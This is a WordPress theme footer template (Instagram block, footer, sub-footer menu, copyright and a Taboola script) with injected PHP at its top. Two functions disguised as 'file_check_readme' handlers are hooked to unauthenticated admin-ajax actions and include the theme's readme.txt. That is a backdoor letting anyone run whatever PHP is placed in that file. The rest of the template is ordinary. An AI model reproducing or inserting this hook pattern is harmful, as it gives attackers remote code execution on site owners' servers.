if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
<!-- Instagram --> <?php if (td_util::get_option('tds_footer_instagram') == 'show') { ?> <div class="td-main-content-wrap td-footer-instagram-container"> <?php //get the instagram id from the panel $tds_footer_instagram_id = td_util::get_option('tds_footer_instagram_id'); ?> <div class="td-instagram-user"> <h4 class="td-footer-instagram-title"> <?php echo __td('Follow us on Instagram', TD_THEME_NAME); ?> <a class="td-footer-instagram-user-link" href="https://www.instagram.com/<?php echo $tds_footer_instagram_id ?>" target="_blank">@<?php echo $tds_footer_instagram_id ?></a> </h4> </div> <?php //get the other panel seetings $tds_footer_instagram_nr_of_row_images = intval(td_util::get_option('tds_footer_instagram_on_row_images_number')); $tds_footer_instagram_nr_of_rows = intval(td_util::get_option('tds_footer_instagram_rows_number')); $tds_footer_instagram_img_gap = td_util::get_option('tds_footer_instagram_image_gap'); $tds_footer_instagram_header = td_util::get_option('tds_footer_instagram_header_section'); //show the insta block echo td_global_blocks::get_instance('td_block_instagram')->render( array( 'instagram_id' => $tds_footer_instagram_id, 'instagram_header' => /*td_util::get_option('tds_footer_instagram_header_section')*/1, 'instagram_images_per_row' => $tds_footer_instagram_nr_of_row_images, 'instagram_number_of_rows' => $tds_footer_instagram_nr_of_rows, 'instagram_margin' => $tds_footer_instagram_img_gap, ) ); ?> </div> <?php }?> <!-- Footer --> <?php if (td_util::get_option('tds_footer') != 'no') { td_api_footer_template::_helper_show_footer(); } ?> <!-- Sub Footer --> <?php if (td_util::get_option('tds_sub_footer') != 'no') { ?> <div class="td-sub-footer-container"> <div class="td-container"> <div class="td-pb-row"> <div class="td-pb-span7 td-sub-footer-menu"> <?php wp_nav_menu(array( 'theme_location' => 'footer-menu', 'menu_class' => 'td-subfooter-menu', 'fallback_cb' => 'td_wp_footer_menu', )); //if no menu function td_wp_footer_menu() { //do nothing? } ?> </div> <div class="td-pb-span5 td-sub-footer-copy"> <?php $tds_footer_copyright = stripslashes(td_util::get_option('tds_footer_copyright')); $tds_footer_copy_symbol = td_util::get_option('tds_footer_copy_symbol'); //show copyright symbol if ($tds_footer_copy_symbol == '') { echo '© '; } echo $tds_footer_copyright; ?> </div> </div> </div> </div> <?php }?> </div><!--close td-outer-wrap--> <?php wp_footer();?> <script type="text/javascript"> window._taboola = window._taboola || []; _taboola.push({flush: true}); </script> </body> </html>